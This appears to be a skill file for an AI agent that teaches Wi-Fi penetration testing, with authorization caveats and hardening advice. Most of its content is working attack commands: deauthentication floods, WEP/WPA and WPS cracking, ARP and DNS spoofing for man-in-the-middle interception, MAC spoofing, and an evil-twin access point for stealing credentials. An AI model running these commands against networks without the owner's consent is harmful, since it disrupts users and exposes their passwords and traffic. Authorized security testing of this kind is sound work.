Wi-Fi Penetration Testing
Installation
SKILL.md
Wi-Fi Penetration Testing
Purpose
Assess wireless network security by testing encryption strength, capturing authentication handshakes, and exploiting vulnerabilities in Wi-Fi implementations. This skill covers reconnaissance, pre-connection attacks, encryption cracking, and post-connection exploitation techniques for comprehensive wireless security auditing.
Prerequisites
Required Hardware
- Wireless adapter supporting monitor mode and packet injection
- Recommended chipsets: Atheros AR9271, Realtek RTL8812AU, Alfa AWUS036ACH
- Computer running Kali Linux or similar penetration testing OS
Required Tools
# Core wireless tools
sudo apt-get install aircrack-ng wireshark reaver
# Additional tools
sudo apt-get install ettercap-graphical bettercap hostapd-wpe
Required Knowledge
- Understanding of 802.11 wireless protocols
- Wi-Fi security protocols (WEP, WPA, WPA2, WPA3)
- Basic networking concepts
- Linux command-line proficiency
Required Access
- Written authorization from network owner
- Physical proximity to target network
- Test environment for practice
Outputs and Deliverables
- Wireless Security Assessment Report - Document network vulnerabilities and encryption weaknesses
- Captured Handshakes - WPA/WPA2 4-way handshake files for analysis
- Cracked Credentials - Successfully recovered network passwords
- Remediation Recommendations - Security hardening guidance
Core Workflow
Phase 1: Wireless Adapter Setup
Connect and verify wireless adapter capabilities:
# Check if adapter is recognized
lsusb
# Look for: "Realtek Semiconductor Corp." or "Atheros Communications"
# Verify wireless interface exists
ifconfig
iwconfig
# Install drivers if needed (Realtek example)
sudo apt-get update
sudo apt-get install realtek-rtl88xxau-dkms
Phase 2: Enable Monitor Mode
Configure adapter for packet capture:
# Check current mode
iwconfig wlan0
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Verify monitor mode (interface becomes wlan0mon)
iwconfig wlan0mon
# Should show: Mode: Monitor
Phase 3: Network Discovery
Scan for available wireless networks:
# Scan all networks
sudo airodump-ng wlan0mon
# Output columns:
# BSSID - Access point MAC address
# PWR - Signal strength (higher = closer)
# Beacons - Number of beacon frames
# #Data - Number of data packets
# #/s - Data packets per second
# CH - Channel
# MB - Maximum speed
# ENC - Encryption (WEP, WPA, WPA2, OPN)
# CIPHER - Cipher (CCMP, TKIP, WEP)
# AUTH - Authentication (PSK, MGT, SKA, OPN)
# ESSID - Network name
# Filter by specific channel
sudo airodump-ng -c 6 wlan0mon
# Filter by BSSID
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF wlan0mon
Phase 4: Target Specific Network
Focus capture on target network:
# Capture packets from specific network
sudo airodump-ng --bssid [TARGET_BSSID] -c [CHANNEL] -w capture wlan0mon
# Example:
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w capture wlan0mon
# This creates:
# capture-01.cap - Packet capture file
# capture-01.csv - CSV with network info
# capture-01.kismet.csv - Kismet format
Phase 5: WEP Cracking
Crack outdated WEP encryption:
# Step 1: Start capture on target
sudo airodump-ng --bssid [BSSID] -c [CH] -w wep_capture wlan0mon
# Step 2: Fake authentication (if needed)
sudo aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [YOUR_MAC] wlan0mon
# Step 3: ARP replay attack (generate traffic)
sudo aireplay-ng -3 -b [BSSID] -h [YOUR_MAC] wlan0mon
# Step 4: Wait for sufficient IVs (typically 20,000+)
# Monitor #Data column in airodump-ng
# Step 5: Crack the key
sudo aircrack-ng wep_capture-01.cap
# Output: KEY FOUND! [ XX:XX:XX:XX:XX ]
Phase 6: WPA/WPA2 Handshake Capture
Capture 4-way handshake for offline cracking:
# Step 1: Monitor target network
sudo airodump-ng --bssid [BSSID] -c [CH] -w wpa_capture wlan0mon
# Step 2: Wait for client connection OR force deauthentication
# Deauth attack (forces reconnection)
sudo aireplay-ng --deauth 10 -a [BSSID] wlan0mon
# Deauth specific client
sudo aireplay-ng --deauth 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon
# Step 3: Watch for "WPA handshake: [BSSID]" in airodump-ng
# Step 4: Verify handshake capture
sudo aircrack-ng wpa_capture-01.cap
# Should show: "1 handshake"
Phase 7: WPA/WPA2 Password Cracking
Crack captured handshake with wordlist:
# Dictionary attack
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] wpa_capture-01.cap
# Using custom wordlist
sudo aircrack-ng -w custom_wordlist.txt -b [BSSID] wpa_capture-01.cap
# Using hashcat (faster with GPU)
# Convert capture to hashcat format
sudo aircrack-ng -j hash wpa_capture-01.cap
# Run hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Brute force with hashcat (8-character passwords)
hashcat -m 22000 -a 3 hash.hc22000 ?a?a?a?a?a?a?a?a
Phase 8: WPS Attack
Exploit Wi-Fi Protected Setup vulnerabilities:
# Scan for WPS-enabled networks
sudo wash -i wlan0mon
# Attack WPS PIN
sudo reaver -i wlan0mon -b [BSSID] -vv
# Faster Pixie-Dust attack
sudo reaver -i wlan0mon -b [BSSID] -vv -K 1
# Using bully (alternative tool)
sudo bully -b [BSSID] -c [CH] wlan0mon
Phase 9: Post-Connection Attacks
After gaining network access:
Man-in-the-Middle Attack:
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# ARP spoofing with ettercap
sudo ettercap -T -q -i wlan0 -M arp:remote /[VICTIM_IP]// /[ROUTER_IP]//
# Using arpspoof
sudo arpspoof -i wlan0 -t [VICTIM_IP] [ROUTER_IP]
sudo arpspoof -i wlan0 -t [ROUTER_IP] [VICTIM_IP]
DNS Spoofing:
# Create etter.dns file
echo "* A [YOUR_IP]" > /etc/ettercap/etter.dns
# Run ettercap with DNS spoofing
sudo ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof /[VICTIM_IP]// /[ROUTER_IP]//
Capture Credentials:
# Capture HTTP traffic
sudo tcpdump -i wlan0 -w traffic.pcap
# Capture with specific filters
sudo tcpdump -i wlan0 port 80 or port 443 -w web_traffic.pcap
# Analyze with Wireshark
wireshark traffic.pcap
Phase 10: MAC Address Spoofing
Evade MAC-based access controls:
# View current MAC
ifconfig wlan0 | grep ether
# Disable interface
sudo ifconfig wlan0 down
# Change MAC address
sudo ifconfig wlan0 hw ether 00:11:22:33:44:55
# Or use macchanger
sudo macchanger -r wlan0 # Random MAC
sudo macchanger -m 00:11:22:33:44:55 wlan0 # Specific MAC
# Enable interface
sudo ifconfig wlan0 up
Quick Reference
Essential Commands
| Action | Command |
|---|---|
| Enable monitor mode | sudo airmon-ng start wlan0 |
| Disable monitor mode | sudo airmon-ng stop wlan0mon |
| Scan networks | sudo airodump-ng wlan0mon |
| Target network | sudo airodump-ng --bssid [BSSID] -c [CH] -w capture wlan0mon |
| Deauth attack | sudo aireplay-ng --deauth 10 -a [BSSID] wlan0mon |
| Crack WPA | sudo aircrack-ng -w wordlist.txt capture.cap |
| WPS attack | sudo reaver -i wlan0mon -b [BSSID] -vv |
| Kill processes | sudo airmon-ng check kill |
Wi-Fi Security Protocols
| Protocol | Security Level | Cracking Difficulty |
|---|---|---|
| Open | None | N/A - No encryption |
| WEP | Very Weak | Easy - Minutes with traffic |
| WPA-TKIP | Weak | Medium - Dictionary attack |
| WPA2-PSK | Moderate | Hard - Strong password resistant |
| WPA2-Enterprise | Strong | Very Hard - Requires credentials |
| WPA3 | Strong | Very Hard - Dragonfly handshake |
Common Wordlists
# Kali Linux wordlists
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
/usr/share/wordlists/nmap.lst
/usr/share/john/password.lst
# Download SecLists
git clone https://github.com/danielmiessler/SecLists
# Wi-Fi specific: SecLists/Passwords/WiFi-WPA/
Signal Strength Guide
| PWR Value | Quality | Recommended Action |
|---|---|---|
| -30 to -50 | Excellent | Ideal for testing |
| -50 to -60 | Good | Reliable capture |
| -60 to -70 | Fair | May miss packets |
| -70 to -80 | Weak | Move closer |
| Below -80 | Poor | Not viable |
Constraints and Limitations
Legal Constraints
- Only test networks you own or have written authorization to test
- Unauthorized wireless access is illegal in most jurisdictions
- Deauthentication attacks may violate FCC regulations
- Document all testing activities for legal protection
Technical Limitations
- WPA3 uses Dragonfly handshake resistant to offline attacks
- Strong passwords (12+ random characters) are practically uncrackable
- Enterprise authentication requires different attack vectors
- Some adapters don't support 5GHz or certain channels
Environmental Factors
- Signal strength affects capture quality
- Interference from other networks
- Physical obstacles reduce range
- Client activity needed for handshake capture
Examples
Example 1: Complete WPA2 Attack
Scenario: Audit home network security
# Step 1: Setup
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Step 2: Find target
sudo airodump-ng wlan0mon
# Note: BSSID=00:11:22:33:44:55, CH=6, ESSID=HomeNetwork
# Step 3: Capture handshake
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 -w home_capture wlan0mon
# Step 4: Deauth client (new terminal)
sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon
# Step 5: Wait for "WPA handshake" message
# Step 6: Crack password
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt home_capture-01.cap
# Result: KEY FOUND! [ password123 ]
Example 2: Evil Twin Attack
Scenario: Create rogue access point for credential capture
# Step 1: Get target network details
sudo airodump-ng wlan0mon
# Target: "CoffeeShop_WiFi" on channel 1
# Step 2: Create hostapd config
cat > /tmp/hostapd.conf << EOF
interface=wlan1
driver=nl80211
ssid=CoffeeShop_WiFi
channel=1
EOF
# Step 3: Start rogue AP
sudo hostapd /tmp/hostapd.conf
# Step 4: Setup DHCP and DNS
sudo dnsmasq -C /tmp/dnsmasq.conf
# Step 5: Capture credentials with captive portal
Example 3: Hidden Network Discovery
Scenario: Discover and connect to hidden SSID
# Hidden networks show <length: X> in ESSID column
sudo airodump-ng wlan0mon
# Force client deauth to reveal SSID in probe request
sudo aireplay-ng --deauth 5 -a [BSSID] wlan0mon
# ESSID will appear when client reconnects
# Or use mdk3 for probe request flood
sudo mdk3 wlan0mon p -t [BSSID]
Troubleshooting
Monitor Mode Not Working
Problem: airmon-ng start wlan0 fails or no monitor interface created
Solutions:
- Install correct drivers for your adapter chipset
- Check if adapter supports monitor mode:
iw list | grep monitor - Kill interfering processes:
sudo airmon-ng check kill - Try manual method:
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up - Update kernel and drivers
No Handshake Captured
Problem: Deauth attacks not producing handshake
Solutions:
- Ensure client is actively connected to target network
- Increase deauth packet count:
--deauth 50 - Target specific client instead of broadcast
- Move closer to access point for better signal
- Verify you're on the correct channel
- Check if AP has client isolation enabled
Aircrack-ng Not Finding Password
Problem: Wordlist exhausted without finding password
Solutions:
- Verify handshake is complete:
aircrack-ng capture.cap - Use larger wordlists or create custom targeted list
- Try hashcat with GPU acceleration
- Use rule-based attacks to mutate wordlist
- Consider that password may be truly strong/random
Injection Not Working
Problem: Deauth packets not affecting clients
Solutions:
- Verify injection support:
aireplay-ng -9 wlan0mon - Use correct driver for your adapter
- Check if target uses 802.11w (Management Frame Protection)
- Ensure you're close enough to target
- Try different deauth techniques
Security Recommendations
For Network Administrators
- Use WPA3 when devices support it
- Strong Passwords - Minimum 12 random characters
- Disable WPS - Known vulnerability vector
- MAC Filtering - Defense in depth (not sole protection)
- Hidden SSID - Minor obfuscation (not security)
- Regular Audits - Test your own networks periodically
- Guest Networks - Isolate untrusted devices
- Update Firmware - Patch known vulnerabilities
- Enterprise Auth - Use RADIUS for business networks
- Monitor Logs - Detect deauth and rogue AP attacks
Related skills
More from zebbern/secops-cli-guides
hacking fundamentals
This skill should be used when the user asks to "understand hacking basics", "learn about hacker types", "understand network protocols", "learn DNS concepts", "understand attack types", or "explore security tool categories". It provides foundational cybersecurity knowledge.
16jwt security testing
This skill should be used when the user asks to "test JWT security", "hack JWT tokens", "bypass JWT authentication", "crack JWT secrets", or "exploit JWT vulnerabilities". It provides comprehensive JSON Web Token attack techniques and security assessment methodologies.
15mobile application security testing
This skill should be used when the user asks to "perform mobile application penetration testing", "test Android app security", "bypass SSL pinning", "analyze APK files", "reverse engineer mobile apps", "test for insecure data storage", or "assess mobile app vulnerabilities". It provides comprehensive techniques for Android application security assessment.
12networking essentials
|
10buffer overflow exploitation
This skill should be used when the user asks to "exploit buffer overflow vulnerabilities", "develop stack-based exploits", "find EIP offset", "identify bad characters", "create shellcode payloads", "perform fuzzing for crashes", or "gain remote code execution via memory corruption". It provides comprehensive techniques for discovering and exploiting buffer overflow vulnerabilities in Windows applications.
9phishing attacks
|
9